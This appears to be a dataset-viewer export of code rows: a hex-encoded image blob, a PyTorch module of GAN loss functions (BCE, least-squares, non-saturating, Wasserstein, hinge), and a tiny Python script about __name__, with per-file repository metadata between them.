9dd2e1f001041e9e99ab31eb73cb730cd12f973041167a8dbdb8ac542c8d9d4beb60babcba8efe2be8932550c4
d1ae4719ebc56644d7d6d21281a5816e44f14722f1ce4e33e9d6aa29244c9dcd8b6bbb8bd0d7102ac130f9786c
8e3b1aa834f9a69a65777478bf784274e7924134a368bd4b6b996874367f6816abe74d1b303d739fccfad5e798
346010a7e95d91aae491cee0d311d9f202c642e3a9e6ab4914b260bb1db9ce0251ceca48688379524b052703e5
e685b43920e4fe147336559217c8c2e7b9e9d3a5412c113af405873d726ad4999bb1125b426456df83e841c8fe
958daf6a9a7e99fe8373e7a8963e5a25c601f7a5298ecad73cf6daeded2f566b63e6847fdd963b771e809a9b5a
96f754be50f06678e2c164f9b701d4e47519ae7bb7a11d0ebac9f4cd56c57cae1c21c24abb712fa74e47f8554d
5746b9b253aa5a244d68177108df3281c127d066b28cda9599d2e09c7991af6d0c72d85a6b30c8b1c736219222
996dc3f8b1ea6ba0b1d19277fb38b9b86500b26155471d07f9e82a252b0d42e3aee06d35de5f3e4ca105f73ff0
92037f33dea95c595b412a5b2249e5b42e325f20b0fba003d3bd4a95cae5b18fe15ba5bf54f3549f2e52b276c9
231f9735acf72f63716eb7002acdba3191d5c76cfae3f91ab92f7ac34d285c279ae07eeb7c7f20db855e4fa37f
2a75bcc194894fcc3a103231569d910b565fb6ba037797395cf0411c1ab8f768114c6c58f7f4ab8bd489221935
2755c32b951cd402fc5ccaa8aa4961dce2b548cdb15bfbc3208a63b795cb6066a9489b75239b5036d0b4e66262
8d7ee94cd79a789f567d6b545962440c80c4d923181df8ace654b44607971c633bdb79c93b791ed4eb69ded492
9330debb4fcbc91e99f4359dec423b1f0dc693d94f3c985581e3971fc472db4e3f0adbb8912cfc37aed94ecc66
60c62c8e3613ea3d339acea6b2b1d74f48dcc1f096b4f6712d84aebf677903166ff967c8c9fa62bd4a5bcb4648
e6b7ba08cac191860640ebd7daa3111d6e8ba0fddb32bebb7105e47912ee8be512ec6c839ffebd73d7578d1c80
4b1ef0bb4afcd91bb1cff5a8a6b41d49a4cc8b0d226d2a295d5fce17126e18e158765fad6bc0897d1bc5237cc3
0c03f546ff001f7ade4eeee611ec390cde58472b2152473c9c54683f7c4950aa3a11d6a2f735574ae5f8c2a32a
ee014f7c66ae1b64057136ec6785e7354a561b85c64caf131057e5ea33dc55228a7957daddb22b78c8e59ab318
1ae217c8f9c7a678cd594b92f0ee75f988c91e98aa62452ba8a1beb668e41ba2907201c1af38d674d9f4cba481
88647c94900e71fd2a66ae825b19f2245b300a927ae1b9350450e7f7afb5b03ee9e2b24f4219d678684cd74f11
df1c6d0346fdb3e9faff005ae927759b4eb8b6b80dbca18c9e00c63191ef4aa2f78ea84bdd3978bc2cf6efb88b
89616fee1c66b7edf74aa814fcb1fca09e481ef5537cc8c6375a1a31aca016038917046ec60fb53d563906dbad
c8e060638dfea6b2b9b72b68991a28added1f6b46aa1941e491fe7fa55298c50cb1ed90fcc081db03d0fe94ae6
8a368dd9792df7480acacc8e0303e9486d0c6c4e582b9e4f520d245cb5893c40aca10b86ec3e6e95acb6b25b60
b1407b1dbd6aae4ab966e1629adb331d8cbc8acac20fbc9f8d6907a18545ef0e06d723e66e9ce56a44f2e45215
39c7ad55d8972897964f17ef1d02ee51c0ed5e73e2db3b97759e36325b2ae18a72067bd3e6ba14d6871d1a797f
3a637fbf6a895a5123939c7f111d052b5d189e9335ac8ffbd8f70727bf5e2a24bc7926f2ee41126de3d08fa8a9
5a9a6c6fe9f786187ececd1b3924050df3271593796c2dae8dc412c8e31b8e3921bbfd41fd2b3bd9d8da307257
24b2d5adae60da0347708e5704d5f6b69aee131abaae40cee18e47bd4b5666f092686a5aef292bb6f70bb644e9
8c76c7a55a6b0475ddb5430fba7b8cf5a1b1c55d6a24402ca14c9f2a9e4633d6b41d15a168cc8e848edd4d260b
6b10a0de8227e594803d4d69c33452da491167fb4af004849a193768bbb19ad76cb01638ea3922b258a465d244
6dbd88eb5a45984f72033400e442e171eb9a789d3811af38efdaaeec956395f165fdf5b6a325d24a515edc4321
53ce3e9fe7a537c2d6ccf62911920963619c4873b41ea3d7142d10377651f1268da614315addd9c77c18858d1b
6afbe49ef5e76eb35b4ef0bb725b070723f3aa46535667ac5a6a304f691ed5c955db96393f9d0f344b2a2b58a9
427693ebf4ac9dd33a29f2bdca973aa47a46a51b95c59bc837e002573ebed56aca469d4ba3a00ac70430e454ca
375735a6d29588ae34c2f76f74872ce32c3be474c1ad6d3269248b0eff00be1c30239fad36ee8495a5a7516f25
166b2dca12d201b1940ceeef8e2af4047d8b2932371d76139cfa566f6358be856b9082691a791f682369276a8e
d8c0eb57ad583811c849623839e0d3e82d2e4af652372a8778e33ed56062c1c3120c9fc64741410d5e562f0967
10865f99ff008431e48f5ac6be96692e0bb28563c7b538efa18cc846e270b183ef56634f293e75dac4fe35a5c9
45492dad24984f2db6e2083b98640c5702de20483509ecf4ab74801999cb87e1b1d319e00ebc53429191a95c47
a94ef752da80f9c4ce0f04fb554d96fe53c6d1a14c6432f0463b668bd8876bdc726a52da31f2ddb07923ae6af4
3e20b95da73bd070bbce48ad65052d4a8cf958c935192ea17494ef571b5862b574bd46c2de2f2ae639106ddaac
8723f1153cb65629cd377359af2236cb7105c48501e71dbea29c352468f7c0ae1c756cf247707159246cdeba1b
51cc92db70ea02e19dbae011566c1e25db68adba36188994f51d7afa566ca4f528eb70b4d7b6c5cfee900e9c9e
3d6ac4c970df3da2962cc0f3d3f0aabe88977bb3a4d3af546f8a63cc4a158b71824567dda99e7768dff765cf23
b5677f7ac6b1568dc5d46eae74eb10d1c41ca0e99e40a8acf65fc02e60732ab7de42bca9ef5a2dae8e67bd87ac
652605d01ddf2938c63da9d75770da283b09c753e9f9d31232755d694e9773c88e10bb5801b99811e95e6f65a3
c124c8d34d8b69321e51ff002cc9008527a679a7160e3b047716f697725b5a4524b2676a9fbcb20ff77d7e954a
795dddd2487ca60dcaedda57d88aab194ac5b1e18be99433bc3181d72d923f2abb0f85191496bc8cb0e891a162
6b5f68914e04d2f868c16ed3b5d2a30c7ee9930cd9f4a7c3a6dbc11f9734a5ddbf8106063ea6a5cd0d40b42cec
a384c6b113dcee72067b71524052152a90aa8ebf7ea1bb9a2562d5abb6640d2431c6dd438e0e3e9579648b4f58
cc096f142b92a236270dd7bf6a9b0ef61f15dc7773aa4f3208f3b896fe1f502b7da6d3628112cee220ac32e03e
76ff008544ae8b8abbb98b25d4114f79f6bb978ccb2f41cfca30294f886cac900b48a4b84071ba43b4367d075a
396e8a94fa10def89a69a1d8218d93a3277fceaa41e22b9b65db1421727f8063354a36462f7b90db6bda879cf9
732ae7288c8495cfd2aba5c1bb925335ccc8f236e393800d532513a258a4322dcdf328c60007ef7e7d8d6496d2
e3b296d22491d5cfcc431009ec7de9265348c1d461164b09b676f3836448a307db9f51594d7134b334b2cacccf
f333b9c963deb45a9cf2763d154bee52db377fb200ad5b5413b9489897519e3bfe559e86e437ba6dd4f7aa1558
2a8ce6450d9fcff9d360d0e18a454b8762c464765fa669dd0ae25d695106020408abf78bc84835545b44cec5a4
45f719ebec2828ace2276e5f001c720922836c819774c42f7f93a0a004898046f318c6a3804ae770f5a8cc91e0
95c7f8fd69e8086acc4925893ec286951b6952430e99a5e4221f346fcef393c6693cd9438712b1c7bd30236bcb
8030934807a06aab25c4a1bef13cfe74c4466e0b100fe154e4bc9a366404ed1df1c504b653925775fbe724e7ad
40e4107232a7d29a3167a4b58deac3b8d94a8a3d45751a4409a6d8ec65cccdf34a476f6ac99d45b7be8b0498c9
c74c8eb59baa4f7135be523f2a31c92adf352123989a73c8c64679c9cd406e1c740bc0c62a8a18a776e053767f
0a4de563033f5e698884c819b6f5ef4aa081d57a6706810e0032676e1b1c73c9a6f9323b280986c725ce050030
584f904cb1853dcbe7f0e2adff006339507ed90eeecb834c4324d0e5c645cc7c9ec0d569b45911c0f30153c640
3c534c452b986dad0e24999b8cfc8bd6ab4df66b940209b6f192b21c66992d993c899810383f5a182aa13b8373
c76a7e4647ffd9
""")
| 89.148148
| 94
| 0.944121
| 112
| 9,628
| 81.142857
| 0.955357
| 0.002421
| 0.004401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.64463
| 0.054217
| 9,628
| 107
| 95
| 89.981308
| 0.353393
| 0.002389
| 0
| 0
| 0
| 0
| 0.992187
| 0.937598
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009615
| 0
| 0.009615
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
650f396249d2c5e6c28911d288e4bd87b9f79469
| 3,332
|
py
|
Python
|
nnutils/loss/gan.py
|
STomoya/animeface
|
37b3cd26097d7874559d4c152e41e5712b7a1a42
|
[
"MIT"
] | 61
|
2020-06-06T08:25:09.000Z
|
2022-03-28T13:30:10.000Z
|
nnutils/loss/gan.py
|
OrigamiXx/animeface
|
8724006df99ba7ef369e837d8294350ea733611b
|
[
"MIT"
] | 13
|
2020-07-02T02:41:14.000Z
|
2021-05-09T14:24:58.000Z
|
nnutils/loss/gan.py
|
OrigamiXx/animeface
|
8724006df99ba7ef369e837d8294350ea733611b
|
[
"MIT"
] | 8
|
2020-10-03T18:51:16.000Z
|
2022-02-05T18:18:01.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from nnutils.loss._base import Loss
class Adversarial(Loss):
    """Base class for adversarial (GAN) objectives.

    Subclasses provide `real_loss` and `fake_loss`; the discriminator and
    generator objectives are assembled from those two terms.
    """

    def real_loss(self, prob: torch.Tensor) -> torch.Tensor:
        raise NotImplementedError()

    def fake_loss(self, prob: torch.Tensor) -> torch.Tensor:
        raise NotImplementedError()

    def d_loss(self, real_prob: torch.Tensor, fake_prob: torch.Tensor) -> torch.Tensor:
        """Discriminator objective: real term + fake term.

        When ``self.return_all`` is set, also returns the two terms.
        """
        real_term = self.real_loss(real_prob)
        fake_term = self.fake_loss(fake_prob)
        total = real_term + fake_term
        if self.return_all:
            return total, real_term, fake_term
        return total

    def g_loss(self, fake_prob: torch.Tensor) -> torch.Tensor:
        """Generator objective: make fake samples score as real."""
        return self.real_loss(fake_prob)
class GANLoss(Adversarial):
    """Original (minimax) GAN loss.

    Ld = E[log(D(x)) + log(1 - D(G(z)))]
    Lg = E[log(1 - D(G(z)))]
    """

    def __init__(self, return_all: bool = False) -> None:
        super().__init__(return_all=return_all)
        # BCE on raw logits; targets are all-ones (real) or all-zeros (fake).
        self.criterion = nn.BCEWithLogitsLoss()

    def real_loss(self, prob: torch.Tensor) -> torch.Tensor:
        target = torch.ones(prob.size(), device=prob.device)
        return self.criterion(prob, target)

    def fake_loss(self, prob: torch.Tensor) -> torch.Tensor:
        target = torch.zeros(prob.size(), device=prob.device)
        return self.criterion(prob, target)
class LSGANLoss(GANLoss):
    """Least-squares GAN loss (a, b, c = 0, 1, 1).

    Ld = 1/2*E[(D(x) - 1)^2] + 1/2*E[D(G(z))^2]
    Lg = 1/2*E[(D(G(z)) - 1)^2]
    """

    def __init__(self, return_all: bool = False) -> None:
        super().__init__(return_all)
        # Squared error against the same one/zero targets as GANLoss.
        self.criterion = nn.MSELoss()

    def d_loss(self, real_prob: torch.Tensor, fake_prob: torch.Tensor) -> torch.Tensor:
        """Discriminator objective with the LSGAN 1/2 weighting."""
        real_term = 0.5 * self.real_loss(real_prob)
        fake_term = 0.5 * self.fake_loss(fake_prob)
        total = real_term + fake_term
        if self.return_all:
            return total, real_term, fake_term
        return total

    def g_loss(self, fake_prob: torch.Tensor) -> torch.Tensor:
        return 0.5 * self.real_loss(fake_prob)
class NonSaturatingLoss(Adversarial):
    """Non-saturating GAN loss.

    Ld = E[log(D(x)) + log(1 - D(G(z)))]
    Lg = E[log(D(G(z)))]
    """

    def real_loss(self, prob: torch.Tensor) -> torch.Tensor:
        # -log(sigmoid(prob)) == softplus(-prob)
        return F.softplus(prob.neg()).mean()

    def fake_loss(self, prob: torch.Tensor) -> torch.Tensor:
        # -log(1 - sigmoid(prob)) == softplus(prob)
        return F.softplus(prob).mean()
class WGANLoss(Adversarial):
    """Wasserstein GAN (critic) loss.

    Ld = E[D(G(z))] - E[D(x)]
    Lg = -E[D(G(z))]
    """

    def real_loss(self, prob: torch.Tensor) -> torch.Tensor:
        return prob.mean().neg()

    def fake_loss(self, prob: torch.Tensor) -> torch.Tensor:
        return prob.mean()
class HingeLoss(Adversarial):
    """Hinge GAN loss.

    Ld = - E[min(0, 1 + D(x))] - E[min(0, -1 - D(G(z)))]
    Lg = - E[D(G(z))]
    """

    def real_loss(self, prob: torch.Tensor) -> torch.Tensor:
        return F.relu(1. - prob).mean()

    def fake_loss(self, prob: torch.Tensor) -> torch.Tensor:
        return F.relu(1. + prob).mean()

    def g_loss(self, fake_prob: torch.Tensor) -> torch.Tensor:
        # Generator maximizes the critic score directly (no hinge).
        return fake_prob.mean().neg()
| 21.22293
| 60
| 0.556122
| 459
| 3,332
| 3.908497
| 0.152505
| 0.19621
| 0.14214
| 0.167224
| 0.781494
| 0.748606
| 0.715162
| 0.715162
| 0.715162
| 0.610925
| 0
| 0.012409
| 0.298619
| 3,332
| 156
| 61
| 21.358974
| 0.755242
| 0.123349
| 0
| 0.670213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.180851
| false
| 0
| 0.042553
| 0.095745
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
33069d8a4b006d37e31b638f6b2abd71d413db8c
| 130
|
py
|
Python
|
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
# Import Hello.py as a module (runs its top-level code on first import).
import Hello

print('main.py__name__: ', __name__)  # print this module's __name__ variable
# A __name__ value of "__main__" means this file is the one currently being executed.
| 14.444444
| 50
| 0.7
| 22
| 130
| 3.409091
| 0.772727
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 130
| 8
| 51
| 16.25
| 0.721154
| 0.523077
| 0
| 0
| 0
| 0
| 0.293103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.